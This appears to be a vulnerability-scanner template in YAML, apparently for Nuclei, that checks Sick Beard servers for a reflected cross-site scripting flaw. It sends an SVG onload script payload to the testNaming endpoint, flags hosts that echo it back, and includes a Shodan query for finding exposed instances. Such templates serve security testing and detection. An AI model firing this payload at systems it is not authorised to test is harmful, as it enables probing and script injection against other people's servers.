30 lines
675 B
YAML
30 lines
675 B
YAML
id: sick-beard-xss
|
|
|
|
info:
|
|
name: Sick Beard XSS
|
|
author: pikpikcu
|
|
severity: medium
|
|
tags: xss
|
|
reference:
|
|
- https://sickbeard.com/ # vendor homepage
|
|
- https://github.com/midgetspy/Sick-Beard # software link
|
|
metadata:
|
|
shodan-query: sickbeard
|
|
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/config/postProcessing/testNaming?pattern=%3Csvg/onload=alert(document.domain)%3E"
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: word
|
|
words:
|
|
- <svg/onload=alert(document.domain)>
|
|
part: body
|
|
- type: word
|
|
words:
|
|
- "text/html"
|
|
part: header |